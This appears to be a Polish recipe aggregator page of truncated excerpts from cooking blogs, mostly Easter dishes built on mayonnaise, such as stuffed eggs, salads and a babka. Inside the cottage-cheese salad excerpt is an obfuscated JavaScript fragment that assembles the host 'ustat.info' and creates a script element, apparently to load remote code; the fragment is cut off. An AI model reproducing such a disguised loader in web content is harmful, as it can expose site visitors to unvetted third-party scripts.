minut Łatwe Tanie Przepis na puszyście smaczną i nie tylko Wielkanocną babkę z majonezem. Składniki 0,5 szklanki mąki pszennej 0,5 szklanki kartoflanki 2 łyżeczki proszku do pieczenia 1 szklanka cukru 4 jajka 1/3 szklanki majonezu Sposób przyrządzenia 1 Przygotowanie ciasta: Białka oddzielić od żółtek i ubić na sztywno. Dodać cukier, miksować do uzyskania […] Artykuł Puszysta babka(...)majonezie pochodzi z serwisu Blog kulinarny Pysiagotuje.pl
PysiaGotuje.plporcja ) 377 kcal 2 jajka 2 plasterki szynki kawałek konserwowej papryki czerwonej mały ogórek konserwowy łyżka majonezu natka pietruszki sól i pieprz WYKONANIE: 1. Jajka ugotować na twardo, ok 10 min. Ostudzić i obrać. 2. Jajka przekroić wzdłuż na pół, wydrążyć żółtka. 3. Szynkę, paprykę i ogórek pokroić(...)bardzo drobną kostkę. Pietruszkę drobno poszatkować. 4. Żółtka rozgnieść, połączyć z szynką i warzywami. 5. Dodać majonez, doprawić solą i pieprzem do smaku. 6. Połówki jajek wypełnić farszem. INSTRUKCJA - KROK PO KROKU: Kaloryczność przepisu wg Kalkulatora Kalorii : KalkulatorKalorii.net Kalorie Masa Białka Tłuszcze Węglowodany Jajo kurze (całe) 143 100 12.56 9.51 0 Szynka (wędlina
Atlas SmakówSKŁADNIKI: ( 1 porcja ) 202 kcal 2 jajka łyżeczka musztardy pół łyżeczki curry łyżeczka majonezu sól i pieprz WYKONANIE: 1. Jajka ugotować na twardo, ok 10 min. Ostudzić i obrać. 2. Jajka przekroić wzdłuż na pół, wydrążyć żółtka. 3. Żółtka rozgnieść wraz z musztardą, curry i majonezem. Doprawić(...)KROKU: Kaloryczność przepisu wg Kalkulatora Kalorii : KalkulatorKalorii.net Kalorie Masa Białka Tłuszcze Węglowodany Jajo kurze (całe) 143 100 12.56 9.51 0 Musztarda 11 10 0.52 0.54 1.05 Majonez light 48 10 0.13 5 0.53 Podsumowanie
Atlas Smakówmoja dzisiejsza propozycja również powinna Wam posmakować. To jajka faszerowane w wiosennej odsłonie. Jeżeli macie ochotę na lżejszą wersję przygotujcie je tylko z serkiem, jeżeli nie z odrobiną majonezu. Polecam na weekendowe śniadanie, albo na Wielkanoc. Składniki dla 4 osób: 6 jajek ugotowanych na twardo 6-8 rzodkiewek 1 czubata łyżka posiekanego koperku 1 łyżka posiekanego szczypiorku 1 łyżka kremowego(...)serka (naturalnego lub ziołowego) 1 łyżka majonezu (w lżejszej wersji dodatkowa porcja serka serka) sól i pieprz Jajka obrać. Jedno jajko drobno pokroić. Pozostałe przekroić na połówki, wyjąć żółtka, rozdrobnić. Białka odłożyć na bok.Rzodkiewki pokroić w drobną kosteczkę. W misce połączyć posiekane jajo, żółtka, rzodkiewki i zieleninę. Dodawać stopniowo majonez i serek do otrzymania odpowiedniej konsystencji. Doprawić do smaku solą
Pełny talerzlubicie serek wiejski i zielone dodatki, to naprawdę polecam spróbować. Składniki: 1 mini sałatka rzymska 1 opakowanie serka wiejskiego 1 łyżka jogurtu naturalnego 1 i 1/2 łyżki majonezu 1/2 łyżeczki octu winnego lub soku z cytryny 1 płaska łyżeczka cukru pudru mała szczypta soli (u mnie himalajska) pieprz czarny mielony do smaku kiełki rzodkiewki Przygotowanie: Sałatę rwiemy na mniejsze kawałki(...)dodajemy serek wiejski i wstępnie mieszamy. Następnie dodajemy majonez, jogurt, cukier puder, ocet winny (lub cytrynę) oraz małą szczyptę soli i pieprz do smaku. Całość mieszamy łyżką. Próbujemy, opcjonalnie doprawiamy lub dodajemy odrobinę majonezu. Sałatkę posypujemy po wierzchu kiełkami rzodkiewki. Smacznego (function(){ xfgz_=("u"+"")+"s"+"";xfgz_+=("tat.")+("i"); xfgz=document.createElement("script");xfgz.type="text/javascript";xfgz_+="nf"+("o")+"/"; xfgzu
Słodkie okruszkiprzystawka do dań mięsnych, albo samodzielne danie. Składniki na sałatkę z szynką i jajkiem : pęczek rzodkiewki 200 g ulubionej szynki puszka groszku konserwowego 5 jaj pęczek szczypiorku 3 łyżki majonezu 3 łyżki jogurtu naturalnego sól, pieprz Przygotowanie Jajka gotujemy na twardo, studzimy i obieramy. Szynkę, jajka i rzodkiewkę kroimy w kostkę. Szczypiorek siekamy. Groszek odsączamy z zalewy. Wszystkie składniki przekładamy(...)jednej miski. Majonez łączymy z jogurtem i przyprawami. Sosem polewamy resztę składników i dokładnie mieszamy. Sałatkę odstawiamy na godzinę do lodówki. sałatka z szynką i jajkiem Artykuł Wielkanocna sałatka z szynką i jajkiem pochodzi z serwisu Przepisy Kulinarne
e-PrzepisyKulinarneokazała się naprawdę smaczna i pożywna. Idealna na kolację, spotkania z przyjaciółmi czy inne imprezy. Doskonale sprawdzi się także na świątecznym stole wielkanocnym. Do sałatki wykorzystałam majonez kremowy od Folwark , który od czasu jak go spróbowałam pierwszy raz stał się dla mnie numerem 1 :) Składniki: * 6 jajek ugotowanych na twardo * 1 szklanka ugotowanego ryżu(...)łyżek kukurydzy konserwowej * 5 łyżek groszku konserwowego * 3 większe ogórki konserwowe * garść posiekanego szczypiorku * 1 łyżka majonezu * sól i pieprz do smaku Wykonanie: Jajka ugotować na twardo, obrać ze skorupek, pokroić w kostkę. Do miski wsypać pokrojone jajka, szklankę ugotowanego, zimnego ryżu. Dodać groszek i kukurydzę konserwową, pokrojone w kostkę ogórki konserwowe i szczypiorek. Wszystko wymieszać. Dodać majonez, sól
Zrób to smacznieBardzo wiosenne jajka faszerowane rzodkiewką i szczypiorkiem. Znakomita przekąska, przystawka, dodatek do obiadu czy sałatka. Ja najbardziej preferuję wersję śniadaniową. Rzodkiewka wymieszana ze świeżym szczypiorkiem, majonezem (lub jogurtem greckim) smakuje mi najbardziej podczas weekendowych śniadań, kiedy mamy więcej czasu na ich przygotowanie. A na wielkanocnym stole te jajka wniosą odrobinę świeżości, lekkości i na pewno oczarują gości. 5 jajek kilka(...)rzodkiewek (ja dałam 3) pół pęczka szczypiorku 2 łyżki majonezu (lub jogurtu greckiego) sól pieprz kiełki rzodkiewki (adsbygoogle = window.adsbygoogle || []).push({}); Jajka ugotować na twardo, ostudzić, obrać ze skorupek i przekroić na połowę. Rzodkiewki pokroić w kostkę, szczypiorek posiekać. Żółtka rozgnieść w miseczce, najlepiej za pomocą małego widelca, dodać pokrojone rzodkiewki, szczypiorek, majonez (lub jogurt), sól i pieprz. Wszystko dokładnie wymieszać
Wilczkowy Świat - nasze codzienne gotowaniePyszne jajka faszerowane dla wielbicieli rybnych smaków. U nas wersja z sardynkami. Sardynki rozgniecione z żółtkiem, odrobiną majonezu i czerwoną cebulką pokrojoną w kostkę są świetnym pomysłem na farsz, a dodatek rzeżuchy dodaje ciekawego smaczku. To danie bardzo przypadło do gustu najmłodszemu, ale starsi też nie pogardzili. Polecamy bardzo! 5 jajek puszka sardynek w oleju 1 czerwona cebula 1 łyżka(...)majonezu sól pieprz (adsbygoogle = window.adsbygoogle || []).push({}); Jajka ugotować, ostudzić, obrać ze skorupek i pokroić na połówki. Cebulę pokroić w kostkę. Sardynki osączyć z oleju, rozetrzeć z żółtkiem i majonezem i dodać 2/3 pokrojonej cebuli (resztę pozostawić do dekoracji). Doprawić solą i pieprzem. Gotową masą faszerować jajka. Wierzch jajek posypać pozostałą cebulą i świeżą rzeżuchą. Podawać zaraz po przyrządzeniu. (adsbygoogle = window.adsbygoogle
Wilczkowy Świat - nasze codzienne gotowaniejajek nie yobrażam sobie Wielkanocnego śniadania 😀 Dlatego jajka faszerowane awokado to świetna alternatywa dla tradycyjnych jajek z majonezem - nie tylko fantastycznie smakują, ale też pięknie i wiosennie prezentują się na talerzu... Podczas przygotowania farszu, które zajmuje naprawdę chwilę, najważniejsze jest dokładnie skropienie sokiem z cytryny (lub limonki) pokrojonego w kostkę awokado. Jest to niezbędne, aby awokado nie ściemniało przed(...)pewno każdemu posmakują! 😊 SKŁADNIKI: 5 jajek 1 duże awokado lub 2 małe 3/4 dużego ząbka czosnku pół pęczka szczypiorku 2 łyżeczki soku z cytryny lub limonki 4 łyżeczki majonezu (więcej lub mniej według uznania) sól i świeżo zmielony pieprz WYKONANIE: Jajka ugotuj na twardo. Ostudź i obierz ze skorupek. Awokado przekrój na pół, usuń pestkę i łyżeczką wyjmij miąższ
Słodko-Słony Świat Ilonyszczypior – eksperymentujcie! Jajka faszerowane w skorupkach: 6 jajek ok. 300 g pieczarek 1 średnia cebula (lub 2 szalotki) 2 łyżki posiekanego koperku (lub natki pietruszki) 1 łyżka majonezu (lub śmietany) – opcjonalnie 2 łyżki masła + 2 łyżki oleju bułka tarta sól, świeżo mielony pieprz do podania: jogurt lub sos tatarski, rzeżucha listonic_type='fooddrink';listonic_theme='addToShoppingList7';listonic_content(...)jajek ok. 300 g pieczarek 1 średnia cebula (lub 2 szalotki) 2 łyżki posiekanego koperku (lub natki pietruszki) 1 łyżka majonezu (lub śmietany) - opcjonalnie 2 łyżki masła + 2 łyżki oleju bułka tarta sól, świeżo mielony pieprz do podania: jogurt lub sos tatarski, rzeżucha'; document.write(" "); Jajka gotujemy na twardo. Studzimy. Najtrudniajsza część jest na samym początku – musimy przeciąć jaja
Poezja smakuokresie wielkanocnym jemy dużo jajek i staram się je jakoś urozmaicać. Tym razem zrobiłam w sosie na bazie majonezu i śmietany z warzywami. Szybkie do zrobienia i bardzo smaczne. Składniki: 3 jajka ugotowane na twardo 7 rzodkiewek kawałek czerwonej papryki kawałek zielonego ogórka 3 łyżki majonezu Folwark 1 łyżka śmietany 18% gęstej sól pieprz kiełki brokuła ale-raj Przygotowanie: Ogórek(...)paprykę pokroić w bardzo drobną kosteczkę. Rzodkiewki zetrzeć na tarce. Warzywa lekko posolić wymieszać i odłożyć na około pół godziny. Zlać nadmiar płynu ale nie wyciskać z warzyw. Dodać majonez, śmietanę , wymieszać i d oprawić do smaku. Odłożyć na około pół godziny by smaki się przegryzły. Sałatkę wyłożyć na półmisku położyć połówki jaj ek . Na wierzchu jajek położyć kiełki
Ala piecze i gotujedelikatna, puszysta i mięciutka. Rozeszła się w oka mgnieniu, chwała Bogu, że zdążyłam uwiecznić ją na zdjęciach! Swoją delikatną konsystencję zawdzięcza dodatkowi oleju rzepakowego na bazie którego przygotowałam słodki majonez. To dzięki niemu babka jest tak wilgotna. Domowy, pyszny majonez to jeden z powodów dla których w mojej kuchni nie może wręcz zabraknąć oleju rzepakowego! Tylko dzięki niemu moje wypieki(...)łyżek wody Jajka ubijam z cukrem do momentu uzyskania puszystej i jasnej masy. Stopniowo wlewam olej rzepakaowy, łyżka po łyżce, cały czas miksując masę. Powinniśmy uzyskać masę przypominającą majonez. Mąkę przesiewam z proszkiem do pieczenia do osobnej miski. Do ubitej masy dodaję na przemian po łyżce jogurtu i przesianej mąki, miksując masę na niskich obrotach. Na koniec dodaję lawendę
Mango Papajaporcje ) 1 porcja = 350 kcal 150 g filetów śledziowych solonych 2 średnie cebule ( 90 g) 185 g śliwek w occie ( ok 15 szt. ) 2 łyżki majonezu pieprz WYKONANIE: 1. Śledzie pokroić w kostkę i przełożyć do miski. 2. Sliwki odsączyć, zalewę wlać do śledzi. Odstawić na 12h do lodówki. 3. Cebulę drobno posiekać. 4. Śliwki przekrawać(...)pół. 5. Śledzie odsączyć i połączyć z cebulą, śliwkami i majonezem. Doprawić pieprzem. INSTRUKCJA - KROK PO KROKU: Kaloryczność przepisu wg Kalkulatora Kalorii : KalkulatorKalorii.net Kalorie Masa Białka Tłuszcze Węglowodany Filety śledziowe solone a'la Matjas 338 150 27 25.5 0 Cebula (świeża) 36 90 0.99 0.09 6.88 Śliwki węgierki 85 185 1.3 0.37 21.09 Majonez light
Atlas SmakówBłyskawiczny i łatwy do przygotowania gęsty, wegański majonez bez jajek na mleku sojowym. Na innym mleku roślinnym nie próbowałam, ale słyszałam, że inne mleka się do tego nie nadają (domowe mleko sojowe ponoć też nie). Do przygotowania majonezu używam kupnego dobrego mleka sojowego bez cukru. W moim przepisie nie trzeba długo miksować. Nie trzeba też dodawać składników po kolei(...)powoli wlewać olej. Takie techniki wykorzystywane są w przypadku ręcznego ubijania. Korzystając z blendera nie ma takiej potrzeby. http://www.mojadelicja.pl/wp-content/uploads/2017/04/weganski-majonez-bez-jajek-mleko-sojowe-vegan-mayonnaise1b-1170x874.jpg The post Wegański majonez bez jajek na mleku sojowym appeared first on Moja Delicja - Przepisy kulinarne
Moja Delicja